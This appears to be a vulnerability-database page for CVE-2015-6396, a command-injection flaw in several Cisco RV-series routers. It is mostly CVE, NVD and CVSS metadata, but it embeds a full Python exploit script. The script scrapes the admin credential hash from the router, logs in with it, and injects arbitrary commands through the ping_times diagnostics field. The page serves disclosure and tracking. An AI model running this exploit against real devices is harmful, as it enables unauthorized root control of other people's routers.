cve-2015-6396

Vulnerability from cvelistv5

Published

2016-08-08 00:00

Modified

2024-08-06 07:22

Severity ?

Summary

References

URL	Tags
ykramarz@cisco.com	http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w1	Mitigation, Vendor Advisory
ykramarz@cisco.com	http://www.securityfocus.com/bid/92269
ykramarz@cisco.com	http://www.securitytracker.com/id/1036528
ykramarz@cisco.com	https://www.exploit-db.com/exploits/45986/
af854a3a-2127-422b-91ae-364da2661108	http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w1	Mitigation, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/92269
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1036528
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/45986/

Impacted products

Vendor

Product

Version

▼

n/a

Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T07:22:21.064Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20160803 Cisco RV110W, RV130W, and RV215W Routers Command Shell Injection Vulnerability",
            "tags": [
              "vendor-advisory",
              "x_refsource_CISCO",
              "x_transferred"
            ],
            "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w1"
          },
          {
            "name": "45986",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/45986/"
          },
          {
            "name": "92269",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/92269"
          },
          {
            "name": "1036528",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1036528"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2016-08-03T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-12-15T10:57:01",
        "orgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
        "shortName": "cisco"
      },
      "references": [
        {
          "name": "20160803 Cisco RV110W, RV130W, and RV215W Routers Command Shell Injection Vulnerability",
          "tags": [
            "vendor-advisory",
            "x_refsource_CISCO"
          ],
          "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w1"
        },
        {
          "name": "45986",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/45986/"
        },
        {
          "name": "92269",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/92269"
        },
        {
          "name": "1036528",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1036528"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@cisco.com",
          "ID": "CVE-2015-6396",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20160803 Cisco RV110W, RV130W, and RV215W Routers Command Shell Injection Vulnerability",
              "refsource": "CISCO",
              "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w1"
            },
            {
              "name": "45986",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/45986/"
            },
            {
              "name": "92269",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/92269"
            },
            {
              "name": "1036528",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1036528"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
    "assignerShortName": "cisco",
    "cveId": "CVE-2015-6396",
    "datePublished": "2016-08-08T00:00:00",
    "dateReserved": "2015-08-17T00:00:00",
    "dateUpdated": "2024-08-06T07:22:21.064Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2015-6396\",\"sourceIdentifier\":\"ykramarz@cisco.com\",\"published\":\"2016-08-08T00:59:00.140\",\"lastModified\":\"2024-11-21T02:34:55.313\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567.\"},{\"lang\":\"es\",\"value\":\"El analizador de comandos CLI en dispositivos Cisco RV110W, RV130W y RV215W permite a usuarios locales ejecutar comandos shell arbitrarios como un administrador a trav\u00e9s de par\u00e1metros manipulados, tambi\u00e9n conocido como Bug IDs CSCuv90134, CSCux58161 y CSCux73567.\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:L/AC:L/Au:N/C:C/I:C/A:C\",\"baseScore\":7.2,\"accessVector\":\"LOCAL\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"COMPLETE\",\"integrityImpact\":\"COMPLETE\",\"availabilityImpact\":\"COMPLETE\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":3.9,\"impactScore\":10.0,\"acInsufInfo\":true,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:rv110w_wireless-n_vpn_firewall_firmware:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6CAFE09F-6166-42EC-989A-713011997722\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:rv110w_wireless-n_vpn_firewall:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CA92B2A4-A9D9-4BF5-A687-848917283E8C\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C35AFC54-7925-48F9-BA4E-9ACF73DC2723\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:rv130w_wireless-n_multifunction_vpn_router:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BD30B0C7-E04A-4B05-82D1-9DA487F8639D\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B912FFCC-F481-4C39-8E05-BD6CC1FA12A1\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:cisco:rv215w_wireless-n_vpn_router:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BE146ECF-BE5C-4CA1-A325-C3402F540FBB\"}]}]}],\"references\":[{\"url\":\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w1\",\"source\":\"ykramarz@cisco.com\",\"tags\":[\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"http://www.securityfocus.com/bid/92269\",\"source\":\"ykramarz@cisco.com\"},{\"url\":\"http://www.securitytracker.com/id/1036528\",\"source\":\"ykramarz@cisco.com\"},{\"url\":\"https://www.exploit-db.com/exploits/45986/\",\"source\":\"ykramarz@cisco.com\"},{\"url\":\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w1\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"http://www.securityfocus.com/bid/92269\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.securitytracker.com/id/1036528\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.exploit-db.com/exploits/45986/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
  }
}

gsd-2015-6396

Vulnerability from gsd

Modified

2023-12-13 01:20

Details

Aliases

CVE-2015-6396

Aliases

CVE-2015-6396

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2015-6396",
    "description": "The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567.",
    "id": "GSD-2015-6396",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2015-6396"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2015-6396"
      ],
      "details": "The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567.",
      "id": "GSD-2015-6396",
      "modified": "2023-12-13T01:20:04.069131Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "psirt@cisco.com",
        "ID": "CVE-2015-6396",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "20160803 Cisco RV110W, RV130W, and RV215W Routers Command Shell Injection Vulnerability",
            "refsource": "CISCO",
            "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w1"
          },
          {
            "name": "45986",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/45986/"
          },
          {
            "name": "92269",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/92269"
          },
          {
            "name": "1036528",
            "refsource": "SECTRACK",
            "url": "http://www.securitytracker.com/id/1036528"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv110w_wireless-n_vpn_firewall_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv110w_wireless-n_vpn_firewall:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv130w_wireless-n_multifunction_vpn_router:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:rv215w_wireless-n_vpn_router:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@cisco.com",
          "ID": "CVE-2015-6396"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-78"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20160803 Cisco RV110W, RV130W, and RV215W Routers Command Shell Injection Vulnerability",
              "refsource": "CISCO",
              "tags": [
                "Mitigation",
                "Vendor Advisory"
              ],
              "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w1"
            },
            {
              "name": "92269",
              "refsource": "BID",
              "tags": [],
              "url": "http://www.securityfocus.com/bid/92269"
            },
            {
              "name": "1036528",
              "refsource": "SECTRACK",
              "tags": [],
              "url": "http://www.securitytracker.com/id/1036528"
            },
            {
              "name": "45986",
              "refsource": "EXPLOIT-DB",
              "tags": [],
              "url": "https://www.exploit-db.com/exploits/45986/"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": true,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "COMPLETE",
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 10.0,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2018-12-15T11:29Z",
      "publishedDate": "2016-08-08T00:59Z"
    }
  }
}

The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567. shell A command execution vulnerability exists. The Cisco RV110WRV130W and RV215W are Cisco router products. Multiple Cisco Products are prone to a local command-injection vulnerability. A local attacker can exploit this issue to execute arbitrary commands on the host operating system with root privileges. This issue being tracked by Cisco Bug IDs CSCuv90134, CSCux58161 and CSCux73567. The following products are affected: RV110W Wireless-N VPN Firewall RV130W Wireless-N Multifunction VPN Router RV215W Wireless-N VPN Router. #!/usr/bin/env python2

Cisco RV110W Password Disclosure and OS Command Execute.

Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)

Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute

Date: 2018-08

Exploit Author: RySh

Vendor Homepage: https://www.cisco.com/

Version: 1.1.0.9

Tested on: RV110W 1.1.0.9

CVE : CVE-2014-0683, CVE-2015-6396

import os import sys import re import urllib import urllib2 import getopt import json

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

Usage: ./{script_name} 192.168.1.1 443 "reboot"

if name == "main": IP = argv[1] PORT = argv[2] CMD = argv[3]

# Get session key, Just access index page. 
url = 'https://' + IP + ':' + PORT + '/'
req = urllib2.Request(url)
result = urllib2.urlopen(req)
res = result.read()

# parse 'admin_pwd'! -- Get credits
admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd

# Get session_id by POST
req2 = urllib2.Request(url + "login.cgi")
req2.add_header('Origin', url)
req2.add_header('Upgrade-Insecure-Requests', 1)
req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
req2.add_header('User-Agent',
                'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req2.add_header('Referer', url)
req2.add_header('Accept-Encoding', 'gzip, deflate')
req2.add_header('Accept-Language', 'en-US,en;q=0.9')
req2.add_header('Cookie', 'SessionID=')
data = {"submit_button": "login",
        "submit_type": "",
        "gui_action": "",
        "wait_time": "0",
        "change_action": "",
        "enc": "1",
        "user": admin_user,
        "pwd": admin_pwd,
        "sel_lang": "EN"
        }
r = urllib2.urlopen(req2, urllib.urlencode(data))
resp = r.read()
login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]

# Execute your commands via diagnose command parameter, default command is `reboot`
req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
req3.add_header('Origin', url)
req3.add_header('Upgrade-Insecure-Requests', 1)
req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
req3.add_header('User-Agent',
                'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req3.add_header('Referer', url)
req3.add_header('Accept-Encoding', 'gzip, deflate')
req3.add_header('Accept-Language', 'en-US,en;q=0.9')
req3.add_header('Cookie', 'SessionID=')
data_cmd = {"submit_button": "Diagnostics",
        "change_action": "gozila_cgi",
        "submit_type": "start_ping",
        "gui_action": "",
        "traceroute_ip": "",
        "commit": "1",
        "ping_times": "3 |" + CMD + "|",
        "ping_size": "64",
        "wait_time": "4",
        "ping_ip": "127.0.0.1",
        "lookup_name": ""
        }
r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201608-0273",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "rv110w wireless-n vpn firewall",
        "scope": null,
        "trust": 1.2,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rv130w wireless-n multifunction vpn router",
        "scope": null,
        "trust": 1.2,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rv215w wireless-n vpn router",
        "scope": null,
        "trust": 1.2,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rv215w wireless-n vpn router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "*"
      },
      {
        "model": "rv110w wireless-n vpn firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "*"
      },
      {
        "model": "rv130w wireless-n multifunction vpn router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "*"
      },
      {
        "model": "rv110w wireless-n vpn firewall",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rv130w wireless-n multifunction vpn router",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rv215w wireless-n vpn router",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rv215w wireless-n vpn router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rv130w wireless-n multifunction vpn router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rv110w wireless-n vpn firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rv215w wireless-n vpn router",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.3.0.8"
      },
      {
        "model": "rv130w wireless-n multifunction vpn router",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.0.3.16"
      },
      {
        "model": "rv110w wireless-n vpn firewall",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.2.1.7"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-06162"
      },
      {
        "db": "BID",
        "id": "92269"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007226"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201608-173"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-6396"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007226"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Adam Zielinski.",
    "sources": [
      {
        "db": "BID",
        "id": "92269"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2015-6396",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2015-6396",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2016-06162",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "VHN-84357",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
